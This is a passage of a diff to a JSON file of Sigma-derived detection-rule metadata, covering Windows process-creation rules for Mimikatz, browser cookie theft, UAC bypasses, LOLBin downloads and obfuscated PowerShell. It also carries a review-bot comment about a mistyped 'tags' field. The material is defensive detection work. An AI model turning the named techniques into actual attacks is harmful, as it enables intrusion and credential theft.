
] + }, + "uuid": "cd3d1298-eb3b-476c-ac67-12847de55813", + "value": "DLL Execution via Rasautou.exe" + }, + { + "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "meta": { + "author": "frack113", + "creation_date": "2022/02/06", + "falsepositive": [ + "Legitimate commands in .lnk files" + ], + "filename": "proc_creation_win_embed_exe_lnk.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.x86matthew.com/view_post?id=embed_exe_lnk", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_embed_exe_lnk.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", + "value": "Hidden Powershell in Link File Pattern" + }, + { + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_sharpview.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", + "https://github.com/tevora-threat/SharpView/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml" ], "tags": [ "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" + ] + }, + "uuid": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "value": "Suspicious Execution of SharpView Aka PowerView" + }, + { + 
"description": "Detects suspicious IIS native-code module installations via command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/11", + "falsepositive": [ + "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" + ], + "filename": "proc_creation_win_susp_iss_module_install.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iss_module_install.yml" + ], + "tags": [ "attack.persistence", - "attack.t1543.003" + "attack.t1505.003" ] }, - "uuid": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", - "value": "Use of Sysinternals PsService" + "uuid": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", + "value": "IIS Native-Code Module Command Line Installation" }, { - "description": "Detects the use of SharpEvtHook, a tool to tamper with Windows event logs", + "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. 
High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.", "meta": { - "author": "Florian Roth", - "creation_date": "2022/09/07", + "author": "frack113", + "creation_date": "2022/12/09", "falsepositive": [ - "Unknown" + "Very Likely, including launching cmd.exe via Run As Administrator" ], - "filename": "proc_creation_win_sysmon_disable_sharpevtmute.yml", - "level": "high", + "filename": "proc_creation_win_susp_conhost_option.yml", + "level": "informational", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/bats3c/EvtMute", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml" + "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", + "https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control", + "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost_option.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1202" ] }, - "uuid": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", - "value": "SharpEvtMute EvtMuteHook Load" + "uuid": "3037d961-21e9-4732-b27a-637bcc7bf539", + "value": "Suspicious High IntegrityLevel Conhost Legacy Option" }, { - "description": "Detect possible Sysmon driver unload", + "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. 
log4j exploitation)", "meta": { - "author": "Kirill Kiryanov, oscd.community", - "creation_date": "2019/10/23", + "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", + "creation_date": "2021/12/17", "falsepositive": [ - "Unknown" + "Legitimate calls to system binaries", + "Company specific internal usage" ], - "filename": "proc_creation_win_sysmon_driver_unload.yml", - "level": "high", + "filename": "proc_creation_win_shell_spawn_by_java.yml", + "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_driver_unload.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_by_java.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ] }, - "uuid": "4d7cda18-1b12-4e52-b45c-d28653210df8", - "value": "Sysmon Driver Unload" + "uuid": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "value": "Shells Spawned by Java" }, { - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. 
CVE-2022-41120)", + "description": "Detects suspicious powershell execution that ends with a common flag instead of a command or a filename to execute (could be a sign of implicit execution that uses files in WindowsApps directory)", "meta": { - "author": "Florian Roth", - "creation_date": "2022/11/10", + "author": "pH-T, Florian Roth", + "creation_date": "2022/04/08", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_sysmon_exploitation.yml", + "filename": "proc_creation_win_schtasks_powershell_windowsapps_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120", - "https://twitter.com/filip_dragovic/status/1590052248260055041", - "https://twitter.com/filip_dragovic/status/1590104354727436290", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml" + "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_powershell_windowsapps_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "b66474aa-bd92-4333-a16c-298155b120df", + "value": "Suspicious Powershell No File or Command" + }, + { + "description": "Detects persitence via netsh helper", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_netsh_dll_persistence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/software/S0108/", + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.007", + "attack.s0108" + ] + }, + "uuid": "56321594-9087-49d9-bf10-524fe8479452", + "value": "Suspicious Netsh DLL Persistence" + }, + { + "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", + "meta": { + "author": "frack113", + "creation_date": "2022/11/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_msbuild.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.echotrail.io/insights/search/msbuild.exe", + "https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msbuild.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "33be4333-2c6b-44f4-ae28-102cdbde0a31", + "value": "Suspicious Msbuild Execution By Uncommon Parent Process" + }, + { + "description": "Detection well-known mimikatz command line arguments", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate Administrator using tool for password recovery" + ], + "filename": "proc_creation_win_mimikatz_command_line.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://tools.thehacker.recipes/mimikatz/modules", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mimikatz_command_line.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" + ] + }, + "uuid": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "value": "Mimikatz Command Line" + }, + { + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/06", + "falsepositive": [ + "System administrator usage" + ], + "filename": "proc_creation_win_renamed_sdelete.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "c1d867fe-8d95-4487-aab4-e53f2d339f90", + "value": "Renamed Sysinternals Sdelete Usage" + }, + { + "description": "Detects a code page switch in command line or batch scripts to a rare language", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/10/14", + "falsepositive": [ + "Administrative activity (adjust code pages according to your organisation's region)" + ], + "filename": "proc_creation_win_susp_codepage_switch.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cglyer/status/1183756892952248325", + "https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml" + ], + "tags": [ + "attack.t1036", + "attack.defense_evasion" + ] + }, + "uuid": "c7942406-33dd-4377-a564-0f62db0593a3", + "value": "Suspicious Code Page Switch" + }, + { + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_chromium_headless_debugging.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/", + "https://github.com/defaultnamehere/cookie_crimes/", + "https://mango.pdf.zone/stealing-chrome-cookies-without-a-password", + "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chromium_headless_debugging.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1185" + ] + }, + "uuid": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", + "value": "Potential Data Stealing Via Chromium Headless Debugging" + }, + { + "description": "Detects suspicious ways to run Invoke-Execution using IEX acronym", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/24", + "falsepositive": [ + "Legitimate scripts that use IEX" + ], + "filename": "proc_creation_win_susp_powershell_iex_patterns.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml" ], "tags": "No established tags" }, - "uuid": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", - "value": "Suspicious Sysmon as Execution Parent" + "uuid": "09576804-7a05-458e-a817-eb718ca91f54", + "value": "Suspicious PowerShell IEX Execution Patterns" + }, + { + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_certutil_ntlm_coercion.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/issues/243", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "value": "NTLM Coercion Via Certutil.exe" + }, + { + "description": "Detects when attackers use \"sc.exe\" or the powershell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\"", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Administrators settings a service to disable via script or cli for testing purposes" + ], + "filename": "proc_creation_win_disable_service.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_service.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": 
"85c312b7-f44d-4a51-a024-d671c40b49fc", + "value": "Sc Or Set-Service Cmdlet Execution to Disable Services" + }, + { + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "meta": { + "author": "Teymur Kheirkhabarov", + "creation_date": "2019/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2017/03/30/weak-service-permissions/", + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "value": "Possible Privilege Escalation via Weak Service Permissions" + }, + { + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "meta": { + "author": "FPT.EagleEye", + "creation_date": "2020/12/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_emotet_rundll32_execution.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://cyber.wtf/2021/11/15/guess-whos-back/", + "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emotet_rundll32_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "value": 
"Emotet RunDLL32 Process Creation" + }, + { + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/11", + "falsepositive": [ + "Legitimate use by administrative staff" + ], + "filename": "proc_creation_win_susp_screenconnect_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ] + }, + "uuid": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "value": "ScreenConnect Remote Access" + }, + { + "description": "A General detection for sdclt spawning new processes. 
This could be an indicator of sdclt being used for bypass UAC techniques.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sdclt_child_process.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "da2738f2-fadb-4394-afa7-0a0674885afa", + "value": "Sdclt Child Processes" + }, + { + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "meta": { + "author": "FLorian Roth", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "filename": "proc_creation_win_susp_psexesvc_renamed.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.youtube.com/watch?v=ro2QuZTIMBM", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "value": "Renamed PsExec Service Execution" + }, + { + "description": "Detects a suspicious process pattern found in CVE-2021-40444 exploitation", + "meta": { + "author": "@neonprimetime, Florian Roth", + "creation_date": "2021/09/08", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_susp_control_cve_2021_40444.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/neonprimetime/status/1435584010202255375", + "https://www.joesandbox.com/analysis/476188/1/iochtml", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "894397c6-da03-425c-a589-3d09e7d1f750", + "value": "CVE-2021-40444 Process Pattern" + }, + { + "description": "Detects different process creation events as described in various threat reports on Lazarus group activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/12/23", + "falsepositive": [ + "Overlap with legitimate process activity in some cases (especially selection 3 and 4)" + ], + "filename": "proc_creation_win_apt_lazarus_activity_dec20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hvs-consulting.de/lazarus-report/", + "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "24c4d154-05a4-4b99-b57d-9b977472443a", + "value": "Lazarus Activity Dec20" + }, + { + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. 
startup (as seen being used by Gamaredon threat group)", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_gamaredon_ultravnc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", + "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gamaredon_ultravnc.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" + ] + }, + "uuid": "871b9555-69ca-4993-99d3-35a59f9f3599", + "value": "Suspicious UltraVNC Execution" + }, + { + "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_certoc_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", + "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "242301bc-f92f-4476-8718-78004a6efd9f", + "value": "Suspicious Load DLL via CertOC.exe" + }, + { + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "meta": { + "author": "Christian Burkard", + 
"creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", + "value": "UAC Bypass Using Consent and Comctl32 - Process" + }, + { + "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", + "meta": { + "author": "frack113", + "creation_date": "2022/05/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_ie4uinit.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/", + "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + "value": "Ie4uinit Lolbin Use From Invalid Path" }, { "description": "Detects UAC bypass method using Windows event viewer", 
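Review bot: The `tags` field of the "Suspicious PowerShell IEX Execution Patterns" entry is a bare string (`"tags": "No established tags"`, a context line carried over onto the new side) while every other entry in this hunk stores an array, so a consumer that iterates `meta.tags` will either walk the characters of the sentinel or fail on the type mismatch; emit `"tags": []` (or omit the key) so the field keeps one type across the file. This cluster file looks generated from the Sigma rule set, so the fix presumably belongs in the generator rather than in a hand edit of this JSON. Two lesser points inherited from the upstream rule text: `creation_date` values use `YYYY/MM/DD` (e.g. `"2021/11/26"`) rather than an ISO 8601 date, and descriptions carry typos such as `non-deafualt` and `persitence`. The enclosing array of cluster entries starts and ends outside the hunk.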
@@ -55871,99 +45007,4760 @@ "value": "UAC Bypass via Event Viewer" }, { - "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", "meta": { - "author": "Max Altgelt", - "creation_date": "2022/08/23", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/04", "falsepositive": [ - "Unknown" + "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" ], - "filename": "proc_creation_win_sysnative.yml", + "filename": "proc_creation_win_wusa_susp_cab_extraction.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysnative.yml" + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml" ], "tags": [ - "attack.t1055" + "attack.execution" ] }, - "uuid": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", - "value": "Process Creation Using Sysnative Folder" + "uuid": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", + "value": "Wusa Extracting Cab Files" }, { - "description": "Detects a Windows program executable started from a suspicious folder", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "meta": { - "author": "Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", - "creation_date": 
"2017/11/27", + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", "falsepositive": [ - "Exotic software" + "Unknown" ], - "filename": "proc_creation_win_system_exe_anomaly.yml", + "filename": "proc_creation_win_invoke_obfuscation_via_compress.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_compress.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION" + }, + { + "description": "Detects the export of the target Registry key to a file.", + "meta": { + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate export of keys" + ], + "filename": "proc_creation_win_regedit_export_keys.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1012" + ] + }, + "uuid": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", + "value": "Exports Registry Key To a File" + }, + { + "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_msohtmed_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + 
"refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "value": "Download Arbitrary Files Via MSOHTMED.EXE" + }, + { + "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/22", + "falsepositive": [ + "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" + ], + "filename": "proc_creation_win_exploit_cve_2017_0261.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "value": "Exploit for CVE-2017-0261" + }, + { + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "meta": { + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "creation_date": "2019/01/12", + "falsepositive": [ + "Exclude legitimate logon scripts" + ], + "filename": "proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/GelosSnake/status/934900723426439170", - "https://asec.ahnlab.com/en/39828/", - 
